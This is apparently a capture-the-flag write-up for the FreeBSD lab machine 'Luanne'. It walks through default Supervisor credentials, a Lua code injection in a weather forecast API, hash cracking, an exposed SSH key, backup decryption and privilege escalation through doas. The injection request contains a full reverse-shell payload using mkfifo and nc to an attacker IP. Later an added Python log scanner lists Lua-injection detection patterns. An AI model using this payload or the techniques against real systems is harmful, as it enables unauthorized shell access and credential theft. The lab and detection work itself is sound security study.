Luanne

Luanne has three ports open: 22 (SSH), 80 and 9001. Both 80 and 9001 require Basic Auth credentials. Nmap reveals that the Supervisor process manager is running on port 9001, and after reading about Supervisor's default configuration and trying the default credentials, we get in. There's not much to see except the running processes of the server:

[image: supervisor-processes-view]

Also, port 80 has a robots.txt, which is not restricted by basic auth and tells us that there is a /weather endpoint, which is functional but returns a 404 status code. Running dirb on port 80 with the /weather prefix reveals that there's some kind of forecast API service at the /weather/forecast endpoint.

[image: weather-forecast]

It's more intuitive to use Burp Suite for playing with the API, so after switching to Burp and trying some special characters the app returned an error:

[image: forecast-error]

This makes finding the vulnerability a lot easier. I had no previous experience with Lua, so finding the correct syntax and exploit paths took some time, but after some testing and googling about Lua syntax and FreeBSD functionality (did I mention this box is FreeBSD and not regular Linux? Oh well..) the payload that worked was:

 GET /weather/forecast?city=Lahti'+..+require("os")+..+print(os.execute("rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2>%261|nc+10.10.14.50+1339+>/tmp/f"))' HTTP/1.1
 Host: 10.129.43.222
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate
 Connection: close
 Upgrade-Insecure-Requests: 1
 Cache-Control: max-age=0
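From the defender's side, the same request is easy to spot in web server logs once the query string is URL-decoded. The following is an added example (not part of the original writeup or the box) that scans constructed Common Log Format lines for Lua code markers in parameter values, plus the weaker signal of a 5xx response to unusual input that gave the bug away above:

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Common Log Format lines (not from the box). The first carries the
# same shape of Lua injection as the request above, with a harmless probe command.
SAMPLE_LOG = """\
10.10.14.50 - - [16/Sep/2020:18:20:01 +0000] "GET /weather/forecast?city=Lahti'+..+require(%22os%22)+..+print(os.execute(%22id%22))' HTTP/1.1" 500 123
10.10.14.51 - - [16/Sep/2020:18:21:07 +0000] "GET /weather/forecast?city=Lahti HTTP/1.1" 200 456
10.10.14.52 - - [16/Sep/2020:18:22:13 +0000] "GET /weather/forecast?city=Helsinki%20Vantaa HTTP/1.1" 200 470
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Markers of Lua source appearing inside a parameter value, checked after URL decoding
# so that '+' and %XX escapes cannot hide them.
LUA_MARKERS = [
    (re.compile(r"""['"]\s*\.\."""), "string quote followed by Lua '..' concatenation"),
    (re.compile(r"\brequire\s*\("), "call to require()"),
    (re.compile(r"\bos\.execute\s*\("), "call to os.execute()"),
    (re.compile(r"\bio\.popen\s*\("), "call to io.popen()"),
    (re.compile(r"\b(?:load|loadstring|dofile)\s*\("), "dynamic Lua code loading"),
]

def decoded_params(target):
    """Return [(name, value)] for the query string, percent- and plus-decoded."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)

def scan_access_log(text):
    """Return one finding per request whose decoded parameters look like Lua code."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        status = int(m["status"])
        for name, value in decoded_params(m["target"]):
            reasons = [why for rx, why in LUA_MARKERS if rx.search(value)]
            # Weaker signal: the app answered 5xx to a value with unusual characters,
            # the same error behaviour that revealed the injection in the writeup.
            if status >= 500 and re.search(r"[^\w\s,.-]", value):
                reasons.append("server error on non-alphanomeric input".replace("nomeric", "numeric"))
            if reasons:
                findings.append({"ip": m["ip"], "time": m["ts"], "param": name,
                                 "value": value, "status": status, "reasons": reasons})
    return findings
```

Run it against real access logs by passing the file contents to scan_access_log; matching on the decoded value is what makes the '+' and %XX obfuscation in the request above irrelevant.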

After getting in, running whoami tells us that the user running the web app was httpd. The supervisord process info reveals that there is also a different instance running some kind of weather app on port 3001 as r.michaels, which is only available from localhost. I tried the same payload on the port 3001 web app, but it seems like the exploit path was fixed in that app. Also, basic auth is now required on every page and not just the index.

Now that we are in, it's not a bad idea to find the basic auth credentials of the app we got in from and test the same credentials on the fixed weather app. The weather app's root folder has a .htpasswd file which contains:

 webapi_user:$1$vVoNCsOl$lMtBS6GL2upDbR4Owhzyc0

The password is stored as an MD5-crypt hash, and after brute-forcing it with hashcat and the rockyou.txt wordlist, we get the password "iamthebest".

So, this next part is really stupid and ridiculous, but the app is run by r.michaels, so we can get access to r.michaels' home directory with the following command:

 curl -u webapi_user:iamthebest http://127.0.0.1:3001/~r.michaels/

<!DOCTYPE html>
<html><head><meta charset="utf-8"/>
<style type="text/css">
table {
border-top: 1px solid black;
border-bottom: 1px solid black;
}
th { background: aquamarine; }
tr:nth-child(even) { background: lavender; }
</style>
<title>Index of ~r.michaels/</title></head>
<body><h1>Index of ~r.michaels/</h1>
<table cols=3>
<thead>
<tr><th>Name<th>Last modified<th align=right>Size
<tbody>
<tr><td><a href="../">Parent Directory</a><td>16-Sep-2020 18:20<td align=right>1kB
<tr><td><a href="id_rsa">id_rsa</a><td>16-Sep-2020 16:52<td align=right>3kB
</table>
</body></html>

There's a link to an id_rsa file… What the actual f is this.. Oh well, just grab the id_rsa file and log in as r.michaels.

The home folder of r.michaels contains a backups folder with the file "devel_backup-2020-09-16.tar.gz.enc". Decrypting with OpenSSL was not successful, and after googling for alternatives for encryption on FreeBSD I stumbled on a tool called netpgp. Decrypting worked with the command:

 netpgp --decrypt /home/r.michaels/backups/devel_backup-2020-09-16.tar.gz.enc --output=/tmp/devel_backup.tar.gz

The file is still packed with tar, so let's unpack it by running the commands

 cd /tmp/
 tar -xf devel_backup.tar.gz

The unpacked folder contains the source code of the application, with a .htpasswd file holding a different hash than before:

 webapi_user:$1$6xc7I/LW$WuSQCS6n3yXsjPMSmwHDu.

This password was cracked the same way as the previous one, and the password is "littlebear". FreeBSD doesn't have sudo installed but has the alternative doas, which allows running commands as root, so running the command

 doas -u root /bin/sh

with the password "littlebear" we got root. So stupid in so many ways. I would rate this box 0/5, but I learned something new about FreeBSD and Lua, which were not familiar to me prior to this box, so I'd give this one a solid 1/5.